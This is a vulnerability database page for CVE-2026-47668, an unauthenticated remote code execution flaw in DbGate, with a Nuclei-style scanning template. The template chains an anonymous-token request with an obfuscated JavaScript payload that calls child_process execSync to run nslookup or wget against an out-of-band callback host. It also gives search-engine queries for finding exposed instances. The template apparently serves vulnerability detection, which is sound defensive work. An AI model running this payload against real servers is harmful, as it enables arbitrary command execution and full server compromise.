| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for CVE-2026-47668 | 26 May 202614:47 | – | githubexploit | |
| CVE-2026-47668 | 23 Jul 202617:34 | – | attackerkb | |
| CVE-2026-47668 | 20 May 202609:31 | – | circl | |
| CVE-2026-47668 | 23 Jul 202617:34 | – | cve | |
| CVE-2026-47668 DbGate: Unauthenticated Remote Code Execution via JSON Script Runner | 23 Jul 202617:34 | – | cvelist | |
| EUVD-2026-48340 | 23 Jul 202617:34 | – | euvd | |
| DbGate: Unauthenticated Remote Code Execution via JSON Script Runner | 5 Jun 202616:25 | – | github | |
| CVE-2026-47668 | 23 Jul 202618:16 | – | nvd | |
| CVE-2026-47668 DbGate: Unauthenticated Remote Code Execution via JSON Script Runner | 23 Jul 202617:34 | – | osv | |
| GHSA-8V3Q-9VMX-36VC DbGate: Unauthenticated Remote Code Execution via JSON Script Runner | 5 Jun 202616:25 | – | osv |
id: CVE-2026-47668
info:
name: DbGate - Remote Code Execution via Anonymous JWT
author: benharvey-sage
severity: critical
description: |
DbGate contains a remote code execution vulnerability exploitable by unauthenticated attackers. The /auth/login endpoint issues anonymous JWT tokens without credentials, and the /runners/start endpoint accepts JavaScript payloads that execute via Node.js child_process, allowing arbitrary command execution on the server.
impact: |
An unauthenticated attacker can execute arbitrary system commands on the server with the privileges of the DbGate process, leading to full server compromise, data exfiltration from connected databases, lateral movement, and deployment of backdoors or ransomware.
remediation: |
Update DbGate to the latest patched version.
reference:
- https://www.cve.org/CVERecord?id=CVE-2026-47668
- https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc
- https://github.com/dbgate/dbgate
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-47668
epss-score: 0.04339
epss-percentile: 0.90193
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
vendor: dbgate
product: dbgate
shodan-query: http.title:"DbGate"
fofa-query: title="DbGate"
tags: cve,cve2026,dbgate,rce,oast,unauth
flow: http(1) && http(2)
http:
- raw:
- |
POST /auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"amoid":"none"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "accessToken")'
internal: true
condition: and
extractors:
- type: json
name: access_token
part: body
internal: true
json:
- '.accessToken'
- raw:
- |
POST /runners/start HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access_token}}
Content-Type: application/json
{"script":{"type":"json","commands":[{"type":"assign","variableName":"x","functionName":"x;try{var m=process.mainModule;var r=m[\"req\"+\"uire\"];var n=[\"chi\",\"ld_\",\"pro\",\"ces\",\"s\"].join(\"\");var cp=r(n);var o=cp[\"exe\"+\"cSy\"+\"nc\"](\"nslookup {{interactsh-url}} || wget {{interactsh-url}}\").toString();}catch(e){};// ","props":{}}],"packageNames":[]}}
matchers:
- type: dsl
dsl:
- 'contains_any(interactsh_protocol, "dns", "http")'
condition: and
# digest: 4a0a00473045022100aead3bce83dfab02bb10cde2b48f35e29088bc593bc19913a40b540e8bf16d0d022022a53c4e2344f3c3e2997d3e57924e2ef1fc3cfeeae4c102d70021a124f25e3d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation